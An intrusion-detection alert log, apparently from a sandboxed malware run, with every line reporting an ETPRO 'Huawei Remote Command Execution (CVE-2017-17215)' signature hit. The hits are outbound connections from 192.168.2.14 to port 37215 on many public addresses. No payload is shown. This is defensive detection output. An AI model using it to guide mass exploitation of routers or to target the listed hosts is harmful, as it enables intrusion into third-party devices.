                                                        06/13/24-21:32:34.199109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779237215192.168.2.14197.212.1.60
                                                        06/13/24-21:32:52.660855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416237215192.168.2.1441.170.169.102
                                                        06/13/24-21:31:59.195923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4178037215192.168.2.14197.155.238.189
                                                        06/13/24-21:32:32.155562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147437215192.168.2.1441.207.123.174
                                                        06/13/24-21:32:46.509209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232437215192.168.2.14156.179.218.208
                                                        06/13/24-21:32:09.439416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702237215192.168.2.1441.49.97.115
                                                        06/13/24-21:32:42.422865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701637215192.168.2.14156.109.26.204
                                                        06/13/24-21:32:56.755311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292237215192.168.2.1441.49.100.73
                                                        06/13/24-21:32:50.610466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860637215192.168.2.14156.99.144.210
                                                        06/13/24-21:32:48.555515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773637215192.168.2.14197.168.107.255
                                                        06/13/24-21:32:01.240078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963037215192.168.2.14156.222.64.102
                                                        06/13/24-21:33:17.341227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5715637215192.168.2.14156.14.105.101
                                                        06/13/24-21:32:25.993235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650237215192.168.2.14156.186.223.83
                                                        06/13/24-21:32:03.276964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269637215192.168.2.14156.85.224.246
                                                        06/13/24-21:32:48.571518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336837215192.168.2.14197.178.37.169
                                                        06/13/24-21:32:50.629534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227437215192.168.2.14156.30.68.234
                                                        06/13/24-21:33:17.307481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142037215192.168.2.14197.145.225.121
                                                        06/13/24-21:33:15.275208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925637215192.168.2.14156.186.22.5
                                                        06/13/24-21:32:23.835778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917037215192.168.2.14156.132.112.136
                                                        06/13/24-21:33:04.994121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698837215192.168.2.14197.117.58.143
                                                        06/13/24-21:32:03.307652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584237215192.168.2.1441.118.151.101
                                                        06/13/24-21:32:50.632286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746237215192.168.2.14197.89.148.89
                                                        06/13/24-21:32:32.165773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063837215192.168.2.14156.49.26.230
                                                        06/13/24-21:33:04.988087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432637215192.168.2.14197.19.62.65
                                                        06/13/24-21:32:13.567508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641237215192.168.2.14156.49.220.49
                                                        06/13/24-21:32:19.749130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929237215192.168.2.14197.83.56.81
                                                        06/13/24-21:32:25.986685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652837215192.168.2.14197.7.116.188
                                                        06/13/24-21:32:23.944124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488437215192.168.2.14156.9.191.135
                                                        06/13/24-21:32:34.213975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873637215192.168.2.1441.180.12.108
                                                        06/13/24-21:33:07.039707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865837215192.168.2.14197.208.6.124
                                                        06/13/24-21:32:52.658725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714837215192.168.2.14197.195.16.93
                                                        06/13/24-21:32:17.694181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590437215192.168.2.14156.249.118.26
                                                        06/13/24-21:32:23.837001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975237215192.168.2.14197.32.61.147
                                                        06/13/24-21:33:00.871206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709637215192.168.2.14156.142.211.184
                                                        06/13/24-21:32:05.349588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5303637215192.168.2.14197.214.219.10
                                                        06/13/24-21:33:07.059580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263637215192.168.2.14197.99.236.238
                                                        06/13/24-21:32:56.783429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426437215192.168.2.14156.131.128.163
                                                        06/13/24-21:31:59.175527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848637215192.168.2.14156.127.173.223
                                                        06/13/24-21:32:40.375351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277837215192.168.2.14197.240.196.104
                                                        06/13/24-21:31:59.196326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067437215192.168.2.1441.78.199.140
                                                        06/13/24-21:33:15.253083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087837215192.168.2.14156.25.214.39
                                                        06/13/24-21:32:05.350115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788237215192.168.2.1441.45.51.216
                                                        06/13/24-21:32:52.676889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539237215192.168.2.14156.23.36.119
                                                        06/13/24-21:33:09.090869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199637215192.168.2.14197.168.21.94
                                                        06/13/24-21:32:30.078656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555637215192.168.2.14156.82.146.152
                                                        06/13/24-21:32:01.223979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666437215192.168.2.14156.49.142.156
                                                        06/13/24-21:33:07.039641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499037215192.168.2.14156.207.36.100
                                                        06/13/24-21:32:19.730825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428037215192.168.2.1441.61.10.104
                                                        06/13/24-21:32:05.377521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067237215192.168.2.1441.156.51.242
                                                        06/13/24-21:33:07.043108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733637215192.168.2.14197.24.63.31
                                                        06/13/24-21:33:17.306365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812237215192.168.2.14156.128.232.25
                                                        06/13/24-21:32:42.406898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732837215192.168.2.14156.144.88.188
                                                        06/13/24-21:31:57.091696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978237215192.168.2.14197.174.148.185
                                                        06/13/24-21:32:36.245158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787037215192.168.2.14197.192.177.46
                                                        06/13/24-21:32:40.357654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796237215192.168.2.1441.99.186.100
                                                        06/13/24-21:33:00.872560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173237215192.168.2.14197.25.185.231
                                                        06/13/24-21:32:21.802661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781037215192.168.2.14197.11.201.86
                                                        06/13/24-21:32:42.418370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291237215192.168.2.14197.248.11.137
                                                        06/13/24-21:32:01.247026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319037215192.168.2.14197.217.216.126
                                                        06/13/24-21:32:15.638300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330837215192.168.2.14197.220.85.172
                                                        06/13/24-21:32:58.840122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246637215192.168.2.14156.1.205.106
                                                        06/13/24-21:32:01.248532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956237215192.168.2.14156.221.199.41
                                                        06/13/24-21:32:07.404035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416837215192.168.2.14197.27.64.221
                                                        06/13/24-21:32:17.694531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502437215192.168.2.14197.28.102.8
                                                        06/13/24-21:32:38.320409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144437215192.168.2.14197.75.74.43
                                                        06/13/24-21:32:54.710321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356237215192.168.2.1441.133.169.122
                                                        06/13/24-21:32:56.789333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5616437215192.168.2.14197.69.220.233
                                                        06/13/24-21:32:05.369749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950037215192.168.2.1441.176.63.219
                                                        06/13/24-21:32:52.655843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711437215192.168.2.14197.255.34.234
                                                        06/13/24-21:31:57.090207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568437215192.168.2.1441.197.172.241
                                                        06/13/24-21:32:01.238961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804837215192.168.2.14197.84.189.45
                                                        06/13/24-21:32:03.276833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4551437215192.168.2.14197.235.36.247
                                                        06/13/24-21:32:13.567013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370637215192.168.2.14156.255.87.84
                                                        06/13/24-21:31:59.196394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309037215192.168.2.1441.2.55.158
                                                        06/13/24-21:32:50.615193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418037215192.168.2.1441.113.207.85
                                                        06/13/24-21:33:00.884925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533437215192.168.2.14197.213.95.118
                                                        06/13/24-21:32:11.505677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843437215192.168.2.14197.201.89.59
                                                        06/13/24-21:32:09.458347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4170237215192.168.2.14197.97.70.142
                                                        06/13/24-21:32:23.830482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825637215192.168.2.1441.103.70.148
                                                        06/13/24-21:32:48.573332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625237215192.168.2.14156.134.1.104
                                                        06/13/24-21:32:30.079505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833037215192.168.2.14156.6.83.49
                                                        06/13/24-21:32:38.315740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343637215192.168.2.1441.128.138.148
                                                        06/13/24-21:32:58.823053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028837215192.168.2.1441.41.28.93
                                                        06/13/24-21:33:11.156647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829837215192.168.2.14197.126.116.171
                                                        06/13/24-21:32:40.373833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504437215192.168.2.14197.79.239.111
                                                        06/13/24-21:32:48.572611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5872837215192.168.2.14197.249.106.252
                                                        06/13/24-21:32:19.748951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937237215192.168.2.1441.217.239.2
                                                        06/13/24-21:33:11.181125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463237215192.168.2.14156.106.4.134
                                                        06/13/24-21:32:07.417588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029637215192.168.2.1441.149.153.147
                                                        06/13/24-21:32:48.567701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345237215192.168.2.14197.165.159.16
                                                        06/13/24-21:32:01.223595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992037215192.168.2.1441.128.10.150
                                                        06/13/24-21:32:07.403958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900437215192.168.2.1441.137.66.158
                                                        06/13/24-21:32:56.791704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317837215192.168.2.14156.184.37.117
                                                        06/13/24-21:32:01.240689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156837215192.168.2.14156.92.147.164
                                                        06/13/24-21:32:05.349834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819037215192.168.2.14197.108.194.47
                                                        06/13/24-21:32:25.992367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770437215192.168.2.14156.33.231.251
                                                        06/13/24-21:32:30.074013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427637215192.168.2.14156.96.93.139
                                                        06/13/24-21:32:17.697608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315237215192.168.2.1441.87.225.20
                                                        06/13/24-21:32:42.404767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287637215192.168.2.14197.159.87.242
                                                        06/13/24-21:32:38.298698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027637215192.168.2.14197.169.136.48
                                                        06/13/24-21:32:32.170746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289637215192.168.2.14156.213.27.58
                                                        06/13/24-21:32:03.276232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882237215192.168.2.14197.174.171.58
                                                        06/13/24-21:32:30.079746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240637215192.168.2.14197.200.57.184
                                                        06/13/24-21:32:03.310202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352237215192.168.2.14156.197.253.242
                                                        06/13/24-21:32:40.357839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4879837215192.168.2.1441.109.249.190
                                                        06/13/24-21:33:15.274767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373637215192.168.2.14197.183.227.174
                                                        06/13/24-21:31:57.093098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569437215192.168.2.1441.66.135.68
                                                        06/13/24-21:32:11.487083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5472437215192.168.2.14156.134.85.150
                                                        06/13/24-21:32:23.938171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696437215192.168.2.14197.121.180.82
                                                        06/13/24-21:32:58.822334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924437215192.168.2.14197.43.10.208
                                                        06/13/24-21:33:15.256678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399637215192.168.2.14197.32.112.222
                                                        06/13/24-21:33:17.306916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532437215192.168.2.14197.63.111.78
                                                        06/13/24-21:32:42.419991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838837215192.168.2.14197.189.240.77
                                                        06/13/24-21:32:42.404518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14197.24.53.184
                                                        06/13/24-21:32:52.679965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612437215192.168.2.14197.186.208.212
                                                        06/13/24-21:32:52.675938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260237215192.168.2.14197.153.130.16
                                                        06/13/24-21:33:09.089524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402837215192.168.2.14156.187.210.104
                                                        06/13/24-21:32:50.615231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932437215192.168.2.14156.6.0.221
                                                        06/13/24-21:32:25.995301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278237215192.168.2.14156.243.52.165
                                                        06/13/24-21:32:42.406268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650837215192.168.2.14156.36.223.255
                                                        06/13/24-21:32:44.452730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073237215192.168.2.14156.255.23.119
                                                        06/13/24-21:33:11.181698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5582637215192.168.2.14197.110.103.18
                                                        06/13/24-21:33:11.159563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381837215192.168.2.14197.219.186.21
                                                        06/13/24-21:32:03.299012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636237215192.168.2.1441.220.176.254
                                                        06/13/24-21:32:07.404410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954837215192.168.2.1441.229.226.225
                                                        06/13/24-21:32:40.375464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109837215192.168.2.14197.144.122.130
                                                        06/13/24-21:32:46.508625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768837215192.168.2.14197.0.254.224
                                                        06/13/24-21:33:04.993055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630437215192.168.2.1441.63.37.187
                                                        06/13/24-21:32:25.975709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744437215192.168.2.1441.220.11.194
                                                        06/13/24-21:32:54.726394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371437215192.168.2.14197.191.79.113
                                                        06/13/24-21:32:25.978966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607237215192.168.2.1441.177.62.49
                                                        06/13/24-21:32:38.301487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508037215192.168.2.14156.168.101.118
                                                        06/13/24-21:32:48.566964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401837215192.168.2.14197.71.243.10
                                                        06/13/24-21:32:11.484815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035837215192.168.2.14197.97.30.46
                                                        06/13/24-21:32:30.094636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034037215192.168.2.14156.73.227.132
                                                        06/13/24-21:32:34.199058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392237215192.168.2.14156.95.168.39
                                                        06/13/24-21:33:15.276216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621237215192.168.2.1441.103.194.245
                                                        06/13/24-21:32:28.027324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778037215192.168.2.1441.81.210.70
                                                        06/13/24-21:32:30.100673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061637215192.168.2.14156.165.220.188
                                                        06/13/24-21:32:36.247475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435637215192.168.2.14197.189.58.2
                                                        06/13/24-21:32:01.247715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463637215192.168.2.14156.208.54.232
                                                        06/13/24-21:32:21.784939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052037215192.168.2.1441.255.100.112
                                                        06/13/24-21:32:21.802070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895637215192.168.2.1441.149.21.88
                                                        06/13/24-21:32:03.277467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805837215192.168.2.14156.100.103.80
                                                        06/13/24-21:32:32.164285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692237215192.168.2.14197.192.188.160
                                                        06/13/24-21:32:25.977342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304037215192.168.2.14197.142.97.35
                                                        06/13/24-21:33:15.276433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721037215192.168.2.14197.158.238.168
                                                        06/13/24-21:32:05.349796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860037215192.168.2.14197.157.195.201
                                                        06/13/24-21:32:15.608885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445037215192.168.2.14197.208.206.99
                                                        06/13/24-21:32:48.553467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190837215192.168.2.14197.247.64.49
                                                        06/13/24-21:32:25.978513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426237215192.168.2.14197.209.189.60
                                                        06/13/24-21:33:00.884023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492037215192.168.2.1441.81.42.196
                                                        06/13/24-21:33:07.060312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299437215192.168.2.14197.239.141.65
                                                        06/13/24-21:32:52.659421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215637215192.168.2.1441.3.188.12
                                                        06/13/24-21:32:13.546068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3415637215192.168.2.14197.116.46.148
                                                        06/13/24-21:32:28.042614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595037215192.168.2.14197.153.1.74
                                                        06/13/24-21:32:58.841142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020637215192.168.2.1441.105.219.171
                                                        06/13/24-21:31:57.138029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306637215192.168.2.14156.120.94.111
                                                        06/13/24-21:32:01.224949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856237215192.168.2.14197.78.135.255
                                                        06/13/24-21:33:15.256512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891637215192.168.2.14197.141.96.224
                                                        06/13/24-21:32:46.509095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544837215192.168.2.14197.149.21.212
                                                        06/13/24-21:32:30.079211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874437215192.168.2.14156.245.247.240
                                                        06/13/24-21:31:59.174543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008037215192.168.2.14197.49.72.102
                                                        06/13/24-21:32:38.300734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588637215192.168.2.1441.206.23.219
                                                        06/13/24-21:32:34.216717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210237215192.168.2.14197.6.60.3
                                                        06/13/24-21:32:42.409809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3758837215192.168.2.1441.86.182.47
                                                        06/13/24-21:32:34.215112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999637215192.168.2.1441.95.75.216
                                                        06/13/24-21:32:19.749099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318437215192.168.2.14156.94.75.8
                                                        06/13/24-21:32:07.401125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653837215192.168.2.14156.111.180.234
                                                        06/13/24-21:32:17.676962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795637215192.168.2.14156.172.62.242
                                                        06/13/24-21:33:15.276477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741437215192.168.2.1441.13.219.110
                                                        06/13/24-21:33:05.012792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947037215192.168.2.14197.39.158.2
                                                        06/13/24-21:33:09.109356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895637215192.168.2.14156.239.207.93
                                                        06/13/24-21:32:03.308525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011637215192.168.2.14197.35.52.139
                                                        06/13/24-21:32:23.836193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476837215192.168.2.1441.12.12.200
                                                        06/13/24-21:32:25.971778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992437215192.168.2.1441.160.24.16
                                                        06/13/24-21:32:38.321443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904637215192.168.2.14197.123.93.107
                                                        06/13/24-21:32:15.610618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622037215192.168.2.1441.217.155.56
                                                        06/13/24-21:32:17.678465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569637215192.168.2.14156.169.172.212
                                                        06/13/24-21:32:05.369348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962837215192.168.2.14156.58.204.162
                                                        06/13/24-21:33:15.254094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798637215192.168.2.1441.128.97.111
                                                        06/13/24-21:32:34.217609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722437215192.168.2.14156.16.96.133
                                                        06/13/24-21:32:42.420247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135237215192.168.2.1441.165.212.80
                                                        06/13/24-21:32:09.457191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876637215192.168.2.14197.38.183.21
                                                        06/13/24-21:32:30.091684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646637215192.168.2.14156.13.142.99
                                                        06/13/24-21:32:48.567942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352637215192.168.2.14156.113.28.149
